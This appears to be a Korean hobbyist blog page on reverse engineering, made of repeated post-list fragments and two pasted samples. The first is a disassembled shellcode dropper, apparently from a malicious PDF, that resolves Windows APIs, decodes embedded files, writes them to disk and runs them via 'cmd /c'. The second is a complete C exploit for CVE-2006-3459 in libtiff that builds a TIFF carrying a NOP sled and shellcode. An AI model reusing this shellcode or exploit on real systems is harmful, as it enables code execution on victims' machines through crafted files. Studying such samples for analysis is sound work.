'리버싱 > 공부를 위한 샘플들' 카테고리의 다른 글
바이러스 소스라는데 아직 못봤음 (0) | 2010.07.22 |
---|---|
pdf 취약성 파일 드디어 구했구나...ㅡㅡ 개 힘드네 바이러스 구하기도 젠장; 근데 어느 회사에서 샘플도 제공해주는구나 ㅋㅋ 개 고맙군 ㅎ (0) | 2010.07.22 |
바이러스 소스라는데 아직 못봤음 (0) | 2010.07.22 |
---|---|
pdf 취약성 파일 드디어 구했구나...ㅡㅡ 개 힘드네 바이러스 구하기도 젠장; 근데 어느 회사에서 샘플도 제공해주는구나 ㅋㅋ 개 고맙군 ㅎ (0) | 2010.07.22 |
call $+5
push 0Ch
jmp short loc_401099
db 4Ch, 22h, 80h
dd 8AFE987Ch, 0DA08AC0Eh, 0B5B98376h, 7D9BAD78h
dd 0FD97FBDFh, 8A49EA0Fh, 238ADBE8h, 0FA6516E9h
dd 8F17E610h, 0B922F67Bh, 397EC7Ch, 646D630Ch
dd 20632F20h, 615C3A63h, 65626F64h, 6470755Fh
dd 2E657461h, 657865h, 0
dd 5C3A6300h, 61746164h, 4558452Eh, 0
dd 5C3A6300h, 61746164h, 4E49622Eh, 0
db 0
loc_401099:
pop ecx
pop edi
scasd
mov eax, fs:30h
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
loc_4010AB:
push ecx
mov esi, [ebp+3Ch]
mov esi, [esi+ebp+78h]
add esi, ebp
push esi
mov esi, [esi+20h]
add esi, ebp
xor ecx, ecx
dec ecx
loc_4010BE:
inc ecx
lodsd
add eax, ebp
xor ebx, ebx
loc_4010C4:
movsx edx, byte ptr [eax]
cmp dl, dh
jz short loc_4010D3
ror ebx, 0Dh
add ebx, edx
inc eax
jmp short loc_4010C4
loc_4010D3:
cmp ebx, [edi]
jnz short loc_4010BE
pop esi
mov ebx, [esi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [esi+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
stosd
pop ecx
loop loc_4010AB
sub edi, 38h
xor esi, esi
loc_4010F4:
inc esi
lea eax, [edi+80h]
push eax
push esi
call dword ptr [edi+18h]
cmp eax, 0FFFFFFFFh
jz short loc_4010F4
cmp eax, 1000h
jbe short loc_4010F4
mov [edi+4], eax
mov [edi+80h], esi
push dword ptr [edi+4]
push 40h
call dword ptr [edi+34h]
mov [edi+7Ch], eax
push 0
push 0
push 0
push dword ptr [edi+80h]
call dword ptr [edi+10h]
cmp eax, 0FFFFFFFFh
jz short loc_40118B
push 0
lea ebx, [edi+90h]
push ebx
push dword ptr [edi+4]
push dword ptr [edi+7Ch]
push dword ptr [edi+80h]
call dword ptr [edi+28h]
mov ecx, [edi+90h]
sub ecx, 0Ah
mov eax, [edi+7Ch]
loc_401158:
inc eax
cmp dword ptr [eax], 4B435646h
jnz short loc_40116A
cmp dword ptr [eax+4], 19890604h
jz short loc_40116E
loc_40116A:
loop loc_401158
jmp short loc_40118B
loc_40116E:
add eax, 8
mov [edi+94h], eax
loc_401177:
inc eax
cmp dword ptr [eax], 614B614Bh
jnz short loc_401189
cmp dword ptr [eax+4], 19811106h
jz short loc_401197
loc_401189:
loop loc_401177
loc_40118B:
push dword ptr [edi+7Ch]
call dword ptr [edi+30h]
jnz loc_4010F4
loc_401197:
mov [edi+98h], eax
push 2
lea esi, [edi+3Fh]
push esi
call dword ptr [edi+20h]
mov [edi], eax
push 2
lea esi, [edi+58h]
push esi
call dword ptr [edi+20h]
mov [edi+9Ch], eax
push 2
lea esi, [edi+68h]
push esi
call dword ptr [edi+20h]
mov [edi+0A0h], eax
mov ebx, [edi+98h]
sub ebx, [edi+94h]
mov eax, [edi+94h]
loc_4011D8:
xor [eax], bl
dec ebx
inc eax
cmp ebx, 0
jnz short loc_4011D8
mov eax, [edi+94h]
mov ecx, [eax]
mov [edi+0A4h], ecx
add eax, 4
mov ecx, [eax]
mov [edi+0A8h], ecx
add eax, 4
mov ecx, [eax]
mov [edi+0ACh], ecx
add eax, 4
mov esi, eax
push dword ptr [edi+0A4h]
push esi
push dword ptr [edi]
call dword ptr [edi+24h]
push dword ptr [edi+0A8h]
add esi, [edi+0A4h]
push esi
push dword ptr [edi+9Ch]
call dword ptr [edi+24h]
push dword ptr [edi+0ACh]
add esi, [edi+0A8h]
push esi
push dword ptr [edi+0A0h]
call dword ptr [edi+24h]
push dword ptr [edi]
call dword ptr [edi+1Ch]
push dword ptr [edi+9Ch]
call dword ptr [edi+1Ch]
push dword ptr [edi+0A0h]
call dword ptr [edi+1Ch]
call dword ptr [edi+8]
push eax
lea esi, [edi+3Fh]
mov edx, esi
loc_401262:
mov al, [edx]
inc edx
or al, al
jz short loc_40126B
jmp short loc_401262
loc_40126B:
mov byte ptr [edx-1], 20h
pop ecx
loc_401270:
mov al, [ecx]
or al, al
jz short loc_40127C
mov [edx], al
inc edx
inc ecx
jmp short loc_401270
loc_40127C:
mov [edx], al
sub esi, 7
call $+5
add [esp+4+var_4], 0Dh
push 0
push esi
push dword ptr [edi+2Ch]
jmp dword ptr [edi+0Ch]
start endp
db 6Ah
dd 0FFFF6A00h, 90901457h, 90909090h, 0B58h dup(0)
_text ends
arm bof에 대한 문서 (0) | 2011.02.11 |
---|---|
bof 문서들 (0) | 2010.07.22 |
RTL BOF : (Return To Library Buffer Over Flow) (0) | 2010.06.03 |
bof ppt 정리 (0) | 2010.03.28 |
bof 공격 (0) | 2010.03.28 |
#include <stdio.h> #include <string.h> #include <tiffio.h> #include <stdlib.h> #include <stdbool.h> /* * basic exploit for CVE-2006-3459. * * $ ./a.out * [*] creating exploit.tif, target address: 0xb7959000 * [*] marker tag found at offset 524418. * [*] success. * $ display exploit.tif * uid=1000(taviso) gid=100(users) groups=10(wheel) * * -- taviso@gentoo.org */ /* size of nop sled */ #define SLEDSIZ (2048 << 8) /* get this address by printing tif->tif_base in a debugger */ #define RETADDR (0xb7919000 + SLEDSIZ/2) #define MARKER 0xc0de /* this must be unique, make it anything */ unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00" "\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73" "\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x57\x53\x89\xe1\xcd\x80"; TIFFFieldInfo badfield = { MARKER, /* a unique unsigned short we search for */ 100, /* number of shorts to read onto stack */ 100, /* number we want to write into file */ TIFF_SHORT, /* data type */ FIELD_CUSTOM, /* field bit */ 1, /* okay to change? */ 0, /* passcount */ "Exploit" /* a name, unused */ }; int main(int argc, char **argv) { TIFF *tif; FILE *mod; unsigned char *buf; unsigned short d; unsigned f[badfield.field_readcount], i; fprintf(stderr, "[*] creating exploit.tif, target address: %p\n", RETADDR); /* prepare a buffer containing address of shellcode */ for (i = 0; i < badfield.field_readcount; i++) f[i] = RETADDR; /* open the target exploit file */ if ((tif = TIFFOpen("exploit.tif", "w")) == NULL) { fprintf(stderr, "[!] failed to open target.\n"); return 1; } /* teach libtiff about made up tag */ TIFFMergeFieldInfo(tif, &badfield, 1); /* install basic required tags */ TIFFSetField(tif, TIFFTAG_IMAGEWIDTH, SLEDSIZ + sizeof(shellcode)); TIFFSetField(tif, TIFFTAG_IMAGELENGTH, 1); TIFFSetField(tif, TIFFTAG_COMPRESSION, COMPRESSION_NONE); TIFFSetField(tif, TIFFTAG_PHOTOMETRIC, PHOTOMETRIC_MINISBLACK); /* now send buffer containing return addresses */ TIFFSetField(tif, MARKER, &f); if ((buf = malloc(SLEDSIZ + sizeof(shellcode))) == NULL) { fprintf(stderr, "[!] sorry, memory allocation error.\n"); } memset(buf, 0x90, SLEDSIZ); memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode)); /* disguise nop sled and shellcode as image data */ TIFFWriteEncodedStrip(tif, 0, buf, SLEDSIZ + sizeof(shellcode)); TIFFClose(tif); /* okay, now open the file to find the marker taag */ if ((mod = fopen("exploit.tif", "r+")) == NULL) { fprintf(stderr, "[!] failed to open target.\n"); return 1; } /* try to find the MARKER by continually reading shorts. */ /* yes, this is ugly. */ while (true) { if (fread(&d, sizeof(short), 1, mod) < 1) { fprintf(stderr, "[!] failed to find marker.\n"); return 1; } if (d == MARKER) { fprintf(stderr, "[*] marker tag found at offset %d.\n", ftell(mod) - sizeof(short)); /* rewind ready to overwrite it */ if (fseek(mod, - sizeof(short), SEEK_CUR) == -1) { fprintf(stderr, "[!] failed to reposition file.\n"); return 1; } /* i'll use dot range */ d = TIFFTAG_DOTRANGE; /* write it in */ if (fwrite(&d, sizeof(short), 1, mod) < 1) { fprintf(stderr, "[!] failed to write new tag number.\n"); } break; } else { if (fseek(mod, - sizeof(short) + 1, SEEK_CUR) == -1) { fprintf(stderr, "[!] failed to reposition file.\n"); return 1; } } } fclose(mod); fprintf(stderr, "[*] success.\n"); return 0; }
Inside an APT Covert Communications Channel(번역하려고했지만...역시 귀찮군;;;)대충 해석됩니다. ㅎㅎㅎ (0) | 2011.08.17 |
---|---|
pdf 파일 분석 툴 (0) | 2010.07.26 |
2007 kisa 취약점 분석 문서 (0) | 2010.07.22 |
adobe 최근 취약점 (0) | 2010.07.22 |
State of the art in CRiMEPACK Exploit Pack (0) | 2010.07.22 |
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.